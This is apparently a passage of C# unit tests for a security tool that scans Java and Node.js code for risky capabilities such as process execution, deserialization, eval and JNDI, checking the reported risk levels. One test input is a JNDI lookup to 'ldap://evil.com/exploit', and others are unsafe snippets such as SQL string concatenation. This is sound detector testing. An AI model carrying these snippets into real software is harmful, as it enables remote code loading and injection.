Assert.Equal("Yaml.load", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsJacksonEnableDefaultTyping()
{
const string code = @"mapper.enableDefaultTyping();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("Jackson defaultTyping", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - Crypto Patterns
[Fact]
public void ScanFile_DetectsMessageDigest()
{
const string code = @"MessageDigest md = MessageDigest.getInstance(""SHA-256"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("MessageDigest", result[0].Pattern);
Assert.Equal(CapabilityRisk.Low, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsCipher()
{
const string code = @"Cipher cipher = Cipher.getInstance(""AES/CBC/PKCS5Padding"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("Cipher", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsWeakCryptoMD5()
{
const string code = @"MessageDigest md = MessageDigest.getInstance(""MD5"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Pattern == "Weak crypto algorithm" && r.Risk == CapabilityRisk.High);
}
#endregion
#region ScanFile - Database Patterns
[Fact]
public void ScanFile_DetectsDriverManagerGetConnection()
{
const string code = @"Connection conn = DriverManager.getConnection(url);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("DriverManager.getConnection", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsExecuteQuery()
{
const string code = @"ResultSet rs = stmt.executeQuery(sql);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("Statement.executeQuery", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsSqlStringConcatenation()
{
const string code = @"String sql = ""SELECT * FROM users WHERE id="" + userId;";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Contains("SQL", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsCreateNativeQuery()
{
const string code = @"Query q = em.createNativeQuery(""SELECT * FROM users"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("Native SQL query", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region ScanFile - Dynamic Code Patterns
[Fact]
public void ScanFile_DetectsScriptEngineManager()
{
const string code = @"ScriptEngine engine = new ScriptEngineManager().getEngineByName(""javascript"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Kind == CapabilityKind.DynamicCode);
}
[Fact]
public void ScanFile_DetectsScriptEngineEval()
{
const string code = @"Object result = engine.eval(script);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("ScriptEngine.eval", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSpelExpressionParser()
{
const string code = @"SpelExpressionParser parser = new SpelExpressionParser();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("SpEL Parser", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOgnlGetValue()
{
const string code = @"Object value = Ognl.getValue(expression, context, root);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("OGNL.getValue", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsJavaCompiler()
{
const string code = @"JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("JavaCompiler", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - Reflection Patterns
[Fact]
public void ScanFile_DetectsClassForName()
{
const string code = @"Class<?> clazz = Class.forName(""com.example.MyClass"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("Class.forName", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsMethodInvoke()
{
const string code = @"Object result = Method.invoke(obj, args);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("Method.invoke", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSetAccessibleTrue()
{
const string code = @"method.setAccessible(true);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("setAccessible(true)", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsURLClassLoader()
{
const string code = @"URLClassLoader loader = new URLClassLoader(urls);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("URLClassLoader", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsDefineClass()
{
const string code = @"Class<?> clazz = loader.defineClass(name, bytes, 0, bytes.length);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("defineClass", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - Native Code Patterns
[Fact]
public void ScanFile_DetectsSystemLoadLibrary()
{
const string code = @"System.loadLibrary(""mylib"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("System.loadLibrary", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSystemLoad()
{
const string code = @"System.load(""/path/to/libmylib.so"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("System.load", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsNativeMethodDeclaration()
{
const string code = @"private native int doSomething(byte[] data);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("native method", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsUnsafeGetUnsafe()
{
const string code = @"Unsafe unsafe = Unsafe.getUnsafe();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("Unsafe.getUnsafe", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsUnsafeAllocateInstance()
{
const string code = @"Object obj = unsafe.allocateInstance(clazz);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("Unsafe.allocateInstance", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - JNDI Patterns (Log4Shell attack vector)
[Fact]
public void ScanFile_DetectsInitialContext()
{
const string code = @"InitialContext ctx = new InitialContext();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Other, result[0].Kind); // JNDI is categorized as Other
Assert.Equal("InitialContext", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsInitialContextLookup()
{
const string code = @"Object obj = InitialContext.lookup(""java:comp/env/jdbc/mydb"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Other, result[0].Kind);
Assert.Equal("InitialContext.lookup", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsJndiRemoteLookup()
{
const string code = @"ctx.lookup(""ldap://evil.com/exploit"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Pattern == "JNDI remote lookup" && r.Risk == CapabilityRisk.Critical);
}
[Fact]
public void ScanFile_DetectsInitialLdapContext()
{
const string code = @"LdapContext ctx = new InitialLdapContext(env, null);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Other, result[0].Kind);
Assert.Equal("InitialLdapContext", result[0].Pattern);
}
#endregion
#region JavaCapabilityEvidence Tests
[Fact]
public void Evidence_DeduplicationKey_IsCorrect()
{
var evidence = new JavaCapabilityEvidence(
CapabilityKind.Exec,
"Test.java",
10,
"Runtime.exec");
Assert.Equal("Exec|Test.java|10|Runtime.exec", evidence.DeduplicationKey);
}
[Fact]
public void Evidence_ConfidenceIsClamped()
{
var evidence1 = new JavaCapabilityEvidence(
CapabilityKind.Exec, "Test.java", 1, "pattern",
confidence: 2.0f);
var evidence2 = new JavaCapabilityEvidence(
CapabilityKind.Exec, "Test.java", 1, "pattern",
confidence: -1.0f);
Assert.Equal(1.0f, evidence1.Confidence);
Assert.Equal(0.0f, evidence2.Confidence);
}
[Fact]
public void Evidence_CreateMetadata_IncludesAllFields()
{
var evidence = new JavaCapabilityEvidence(
CapabilityKind.Exec,
"Test.java",
10,
"Runtime.exec",
snippet: "Runtime.getRuntime().exec(cmd);",
confidence: 0.95f,
risk: CapabilityRisk.Critical);
var metadata = evidence.CreateMetadata().ToDictionary(kv => kv.Key, kv => kv.Value);
Assert.Equal("exec", metadata["capability.kind"]);
Assert.Equal("Test.java:10", metadata["capability.source"]);
Assert.Equal("Runtime.exec", metadata["capability.pattern"]);
Assert.Equal("critical", metadata["capability.risk"]);
Assert.Equal("0.95", metadata["capability.confidence"]);
Assert.Contains("Runtime.getRuntime()", metadata["capability.snippet"]);
}
[Fact]
public void Evidence_ToLanguageEvidence_ReturnsCorrectFormat()
{
var evidence = new JavaCapabilityEvidence(
CapabilityKind.Exec,
"Test.java",
10,
"Runtime.exec");
var langEvidence = evidence.ToLanguageEvidence();
Assert.Equal(LanguageEvidenceKind.Metadata, langEvidence.Kind);
Assert.Equal("Test.java", langEvidence.Source);
Assert.Equal("line:10", langEvidence.Locator);
Assert.Equal("Exec:Runtime.exec", langEvidence.Value);
}
#endregion
}

View File

@@ -0,0 +1,883 @@
using StellaOps.Scanner.Analyzers.Lang.Node.Internal.Capabilities;
namespace StellaOps.Scanner.Analyzers.Lang.Node.Tests.Internal;
/// <summary>
/// Tests for <see cref="NodeCapabilityScanner"/>.
/// </summary>
public sealed class NodeCapabilityScannerTests
{
private const string TestFile = "test.js";
#region ScanFile - General Tests
[Fact]
public void ScanFile_NullContent_ReturnsEmpty()
{
var result = NodeCapabilityScanner.ScanFile(null!, TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_EmptyContent_ReturnsEmpty()
{
var result = NodeCapabilityScanner.ScanFile("", TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_WhitespaceContent_ReturnsEmpty()
{
var result = NodeCapabilityScanner.ScanFile(" \n\t\n ", TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_NoPatterns_ReturnsEmpty()
{
const string code = @"
function hello() {
console.log('Hello, World!');
}
hello();";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_NormalizesBackslashesInPath()
{
const string code = @"const cp = require('child_process');";
var result = NodeCapabilityScanner.ScanFile(code, @"C:\src\test.js").ToList();
Assert.Single(result);
Assert.Equal("C:/src/test.js", result[0].SourceFile);
}
#endregion
#region ScanFile - Comment Stripping
[Fact]
public void ScanFile_IgnoresSingleLineComments()
{
const string code = @"
// const cp = require('child_process');
function test() { }";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_IgnoresMultiLineComments()
{
const string code = @"
/*
const cp = require('child_process');
eval('code');
*/
function test() { }";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_DoesNotIgnoreCodeInStrings()
{
const string code = @"const msg = 'require(""child_process"")';";
// This should NOT match because it's a string literal
// The scanner should be smart about this
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
// Note: Current implementation may still detect patterns in strings
// This test documents expected behavior - may need adjustment based on implementation
}
#endregion
#region ScanFile - Exec Patterns (Critical)
[Fact]
public void ScanFile_DetectsRequireChildProcess()
{
const string code = @"const cp = require('child_process');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("require('child_process')", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
Assert.Equal(1.0f, result[0].Confidence);
}
[Fact]
public void ScanFile_DetectsImportChildProcess()
{
const string code = @"import { exec } from 'child_process';";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Kind == CapabilityKind.Exec);
}
[Fact]
public void ScanFile_DetectsChildProcessExec()
{
const string code = @"child_process.exec('ls -la', callback);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("child_process.exec", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsChildProcessExecSync()
{
const string code = @"const output = child_process.execSync('pwd');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("child_process.execSync", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsChildProcessSpawn()
{
const string code = @"const proc = child_process.spawn('node', ['app.js']);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("child_process.spawn", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsChildProcessFork()
{
const string code = @"const worker = child_process.fork('./worker.js');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("child_process.fork", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRequireExeca()
{
const string code = @"const execa = require('execa');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("require('execa')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsRequireShelljs()
{
const string code = @"const shell = require('shelljs');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("require('shelljs')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsProcessBinding()
{
const string code = @"const spawn = process.binding('spawn_sync');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("process.binding", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - Filesystem Patterns
[Fact]
public void ScanFile_DetectsRequireFs()
{
const string code = @"const fs = require('fs');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("require('fs')", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRequireFsPromises()
{
const string code = @"const fs = require('fs/promises');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("require('fs/promises')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsFsReadFile()
{
const string code = @"fs.readFile('data.txt', callback);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("fs.readFile", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsFsWriteFile()
{
const string code = @"fs.writeFile('output.txt', data, callback);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("fs.writeFile", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFsUnlink()
{
const string code = @"fs.unlink('file.txt', callback);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("fs.unlink", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFsRm()
{
const string code = @"fs.rm('directory', { recursive: true }, callback);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("fs.rm", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFsChmod()
{
const string code = @"fs.chmod('script.sh', 0o755, callback);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("fs.chmod", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFsSymlink()
{
const string code = @"fs.symlink('target', 'link', callback);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("fs.symlink", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region ScanFile - Network Patterns
[Fact]
public void ScanFile_DetectsRequireNet()
{
const string code = @"const net = require('net');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("require('net')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsRequireHttp()
{
const string code = @"const http = require('http');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("require('http')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsNetCreateServer()
{
const string code = @"const server = net.createServer(handler);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("net.createServer", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsFetch()
{
const string code = @"const response = await fetch('https://api.example.com');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("fetch", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsRequireAxios()
{
const string code = @"const axios = require('axios');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("require('axios')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsNewWebSocket()
{
const string code = @"const ws = new WebSocket('ws://localhost:8080');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("WebSocket", result[0].Pattern);
}
#endregion
#region ScanFile - Environment Patterns
[Fact]
public void ScanFile_DetectsProcessEnv()
{
const string code = @"const apiKey = process.env.API_KEY;";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Kind == CapabilityKind.Environment);
}
[Fact]
public void ScanFile_DetectsProcessEnvBracket()
{
const string code = @"const value = process.env['MY_VAR'];";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Kind == CapabilityKind.Environment);
}
[Fact]
public void ScanFile_DetectsRequireDotenv()
{
const string code = @"require('dotenv').config();";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("require('dotenv')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsProcessChdir()
{
const string code = @"process.chdir('/app');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("process.chdir", result[0].Pattern);
}
#endregion
#region ScanFile - Serialization Patterns
[Fact]
public void ScanFile_DetectsRequireNodeSerialize()
{
const string code = @"const serialize = require('node-serialize');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("require('node-serialize')", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsNodeSerializeUnserialize()
{
const string code = @"const obj = serialize.unserialize(data);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("node-serialize.unserialize", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsYamlLoad()
{
const string code = @"const config = yaml.load(yamlString);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("yaml.load", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsV8Deserialize()
{
const string code = @"const obj = v8.deserialize(buffer);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("v8.deserialize", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region ScanFile - Crypto Patterns
[Fact]
public void ScanFile_DetectsRequireCrypto()
{
const string code = @"const crypto = require('crypto');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("require('crypto')", result[0].Pattern);
Assert.Equal(CapabilityRisk.Low, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsCryptoCreateHash()
{
const string code = @"const hash = crypto.createHash('sha256');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("crypto.createHash", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsWeakHashAlgorithm()
{
const string code = @"const hash = crypto.createHash('md5');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Pattern == "Weak hash algorithm" && r.Risk == CapabilityRisk.High);
}
#endregion
#region ScanFile - Database Patterns
[Fact]
public void ScanFile_DetectsRequireMysql()
{
const string code = @"const mysql = require('mysql');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("require('mysql')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsRequirePg()
{
const string code = @"const { Pool } = require('pg');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("require('pg')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsRequireMongodb()
{
const string code = @"const { MongoClient } = require('mongodb');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("require('mongodb')", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsSqlStringConcatenation()
{
const string code = @"const sql = 'SELECT * FROM users WHERE id=' + id;";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("SQL string concatenation", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - Dynamic Code Patterns (Critical)
[Fact]
public void ScanFile_DetectsEval()
{
const string code = @"const result = eval(userInput);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("eval", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsNewFunction()
{
const string code = @"const fn = new Function('a', 'b', 'return a + b');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("new Function", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRequireVm()
{
const string code = @"const vm = require('vm');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("require('vm')", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsVmRunInContext()
{
const string code = @"vm.runInContext(code, context);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("vm.runInContext", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsVmRunInNewContext()
{
const string code = @"vm.runInNewContext(code, sandbox);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("vm.runInNewContext", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsSetTimeoutWithString()
{
const string code = @"setTimeout('alert(1)', 1000);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("setTimeout with string", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRequireVm2()
{
const string code = @"const { VM } = require('vm2');";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("require('vm2')", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region ScanFile - Reflection Patterns
[Fact]
public void ScanFile_DetectsNewProxy()
{
const string code = @"const proxy = new Proxy(target, handler);";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("new Proxy", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsProtoAccess()
{
const string code = @"obj.__proto__ = malicious;";
var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
